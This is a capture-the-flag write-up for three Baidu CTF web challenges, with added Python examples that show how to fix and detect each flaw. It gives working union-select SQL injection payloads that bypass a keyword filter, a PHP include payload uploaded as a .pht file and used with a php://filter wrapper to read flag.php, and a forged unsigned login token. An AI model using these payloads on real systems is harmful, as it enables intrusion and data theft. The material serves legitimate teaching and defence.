Baidu CTF

Source: Internet   Editor: 程序博客网   Time: 2024/05/17 04:44


1. sql

Hint: the flag is in the database.

Testing shows that the string <> is filtered out (stripped from the input). A blacklisted keyword split with <> therefore passes the keyword check and is reassembled once the <> is removed.

So:

1. Find the number of columns

    or<>der by 1
    or<>der by 2
    or<>der by 3
    or<>der by 4

    4 errors => 3 columns

2. Find which column is echoed

    un<>ion se<>lect 1,2,3

    Column 2 is echoed

3. Get the database names (select schema_name from information_schema.schemata limit N,1)

    un<>ion se<>lect 1,(se<>lect schema_name from information_schema.schemata limit 0,1),3   => information_schema
    un<>ion se<>lect 1,(se<>lect schema_name from information_schema.schemata limit 1,1),3   => sqli

4. Get the table names (select table_name from information_schema.tables where table_schema = database() limit N,1)

    un<>ion se<>lect 1,(se<>lect table_name from information_schema.tables where table_schema ='sqli' limit 0,1),3   => info

5. Get the column names (select column_name from information_schema.columns where table_name = <table name> limit N,1)

Note: here information_schema.columns has to be written as in<>formation_schema.columns

    un<>ion se<>lect 1,(se<>lect column_name from in<>formation_schema.columns where table_name='info' limit 0,1),3   => id
    un<>ion se<>lect 1,(se<>lect column_name from in<>formation_schema.columns where table_name='info' limit 1,1),3   => title
    un<>ion se<>lect 1,(se<>lect column_name from in<>formation_schema.columns where table_name='info' limit 2,1),3   => flAg_T5ZNdrm

6. Get the data (select <column name> from <table name> limit N,1)

    un<>ion se<>lect 1,(se<>lect flAg_T5ZNdrm from info limit 0,1),3
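The filter described above fails because it checks for keywords on the raw input and only then strips <>, so a split keyword is reassembled after the check. The following added example (not code from the writeup or the challenge; the blacklist, the toy schema and the placeholder flag value are all constructed here) reproduces that pattern against an in-memory SQLite table, puts the hardened version (a bound parameter, so the value never becomes SQL text) next to it, and shows a detection helper that normalizes to a fixed point before matching keywords.

```python
import re
import sqlite3

# Constructed toy schema mirroring the writeup's database: table "info" with
# columns id, title and flAg_T5ZNdrm. The flag value is a placeholder.
SCHEMA = """
CREATE TABLE info (id INTEGER PRIMARY KEY, title TEXT, flAg_T5ZNdrm TEXT);
INSERT INTO info VALUES (1, 'hello', 'flag{placeholder}');
"""

# Keyword blacklist of the kind the writeup defeats (assumed, not the challenge's real code).
BLOCKED = re.compile(r"union|select|order", re.IGNORECASE)

# The writeup's final payload, prefixed with an id value that matches nothing.
PAYLOAD = "-1 un<>ion se<>lect 1,(se<>lect flAg_T5ZNdrm from info limit 0,1),3"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def weak_lookup(conn, raw):
    """Vulnerable pattern: keyword check on the raw string, '<>' stripped afterwards,
    result concatenated into SQL. Returns rows, or None if the blacklist rejected the input."""
    if BLOCKED.search(raw):
        return None
    cleaned = raw.replace("<>", "")          # reassembles un<>ion into union
    sql = "SELECT id, title, 1 FROM info WHERE id=" + cleaned
    return conn.execute(sql).fetchall()


def safe_lookup(conn, raw):
    """Hardened: the value travels as a bound parameter, never as SQL text,
    so the security does not rest on keyword filtering at all."""
    return conn.execute("SELECT id, title FROM info WHERE id=?", (raw,)).fetchall()


def keywords_after_normalization(raw):
    """Detection helper: remove '<>' until nothing changes (a fixed point, so
    nested '<<>>' is handled too), then report which blacklisted keywords appear."""
    prev, s = None, raw
    while s != prev:
        prev, s = s, s.replace("<>", "")
    return sorted({m.lower() for m in BLOCKED.findall(s)})


if __name__ == "__main__":
    conn = make_db()
    print("weak  :", weak_lookup(conn, PAYLOAD))      # leaks the placeholder flag
    print("safe  :", safe_lookup(conn, PAYLOAD))      # no rows
    print("detect:", keywords_after_normalization(PAYLOAD))
```

Against the same payload, the weak path returns the placeholder flag row, the parameterized path returns nothing, and the normalizing detector reports both split keywords.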



2. Upload

    Upload any image, then modify the request:

    Content-Disposition: form-data; name="file"; filename="1.pht"

    <script language="PHP">require_once("$_GET[id]");</script>

    Visit URL + /u/1.pht?id=php://filter/convert.base64-encode/resource=../flag.php

    Base64-decode the output to get the flag.
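Two weaknesses are chained above: the upload accepts a .pht file (an extension blacklist that missed one of PHP's handler suffixes) and the uploaded script passes a request parameter straight into require_once, which is what lets a php://filter wrapper read flag.php. The added example below (not the challenge's code; the allowlists, magic bytes and page map are constructed here) shows the server-side checks that close both: an extension allowlist with a content check, a server-chosen storage name, an allowlist lookup in place of a user-controlled include, and a helper for flagging wrapper or traversal values in request logs.

```python
import os
import re
import secrets

# Constructed allowlist: permitted image extensions and the magic bytes each must start with.
ALLOWED_TYPES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Constructed allowlist of includable pages keyed by the id parameter.
PAGES = {"home": "pages/home.php", "about": "pages/about.php"}

WRAPPER_OR_TRAVERSAL = re.compile(r"^[a-z][a-z0-9+.-]*://|(^|[/\\])\.\.([/\\]|$)", re.IGNORECASE)


def validate_upload(filename, content):
    """Return (ok, reason). Only allowlisted extensions pass (so .pht, .phtml, .php are
    never considered), and the bytes must match the claimed image type."""
    base = os.path.basename(filename.replace("\\", "/"))
    if "." not in base:
        return False, "no extension"
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_TYPES:
        return False, f"extension .{ext} not allowed"
    if not any(content.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        return False, "content does not match claimed type"
    return True, ext


def storage_name(ext):
    """Server-chosen file name: the client's filename never reaches the filesystem."""
    return f"{secrets.token_hex(16)}.{ext}"


def resolve_include(id_param):
    """Map the id parameter to a file through an allowlist; wrappers and ../ cannot be expressed."""
    return PAGES.get(id_param)


def suspicious_include_value(value):
    """Detection: True for stream wrappers (php://, data://, ...) or path traversal in a parameter."""
    return bool(WRAPPER_OR_TRAVERSAL.search(value))


if __name__ == "__main__":
    print(validate_upload("1.pht", b'<script language="PHP">require_once("$_GET[id]");</script>'))
    print(validate_upload("cat.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16))
    print(resolve_include("php://filter/convert.base64-encode/resource=../flag.php"))
    print(suspicious_include_value("php://filter/convert.base64-encode/resource=../flag.php"))
```

The point of the allowlist is that the question "is .pht dangerous?" never has to be answered; a PHP payload with a .png name is also rejected because its bytes do not start with the PNG signature.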



3. login

    Inspecting the page source reveals: <!--  test1 test1  -->

    Logging in leads to member.php => (╯‵□′)╯︵┴─┴

    Capturing the request shows: show:0

    So:

    Write a PHP snippet to compute the token:

    <?php
    $arr = array('user' => 'ichunqiu');
    $taken = base64_encode(gzcompress(serialize($arr)));
    echo $taken;
    ?>
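The token above can be computed by anyone because it is nothing more than base64(gzcompress(serialize(array))) with no secret involved, so the server cannot tell a token it issued from one minted by a client. The following added example (not the challenge's code; the secret, the MAC layout and the single-key serialize format are assumptions made here) rebuilds the unsigned token in Python for comparison and then shows the issue/verify pair a server would need: the same compressed payload with an HMAC-SHA256 appended, checked with a constant-time compare before the payload is trusted.

```python
import base64
import hashlib
import hmac
import re
import zlib

# Constructed secret; a real deployment loads it from configuration, not source.
SECRET = b"constructed-server-secret"
MAC_LEN = 32  # SHA-256 digest length


def php_serialize_user(user):
    """PHP serialize() output for array('user' => $user); only this one shape is handled."""
    raw = user.encode()
    return f'a:1:{{s:4:"user";s:{len(raw)}:"{user}";}}'.encode()


def unsigned_token(user):
    """The writeup's construction: base64(gzcompress(serialize(...))). zlib.compress
    produces the same zlib format as gzcompress. No secret, so anyone can mint one."""
    return base64.b64encode(zlib.compress(php_serialize_user(user))).decode()


def issue_token(user, key=SECRET):
    """Signed variant: compressed payload followed by HMAC-SHA256 over it."""
    body = zlib.compress(php_serialize_user(user))
    mac = hmac.new(key, body, hashlib.sha256).digest()
    return base64.b64encode(body + mac).decode()


def verify_token(token, key=SECRET):
    """Return the user name if the MAC checks out, else None. Unsigned, altered or
    foreign-key tokens all fail before the payload is parsed."""
    try:
        raw = base64.b64decode(token, validate=True)
    except ValueError:
        return None
    if len(raw) <= MAC_LEN:
        return None
    body, mac = raw[:-MAC_LEN], raw[-MAC_LEN:]
    if not hmac.compare_digest(mac, hmac.new(key, body, hashlib.sha256).digest()):
        return None
    try:
        data = zlib.decompress(body)
    except zlib.error:
        return None
    m = re.fullmatch(rb'a:1:\{s:4:"user";s:(\d+):"(.*)";\}', data, re.S)
    if not m or int(m.group(1)) != len(m.group(2)):
        return None
    return m.group(2).decode()


if __name__ == "__main__":
    print("unsigned:", unsigned_token("ichunqiu"))
    signed = issue_token("ichunqiu")
    print("signed  :", signed)
    print("verify signed  :", verify_token(signed))
    print("verify unsigned:", verify_token(unsigned_token("ichunqiu")))
```

The verifier rejects the writeup-style token outright (there is no MAC to check), and a token signed under a different key fails the same way; parsing the serialized payload happens only after the MAC has been accepted.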
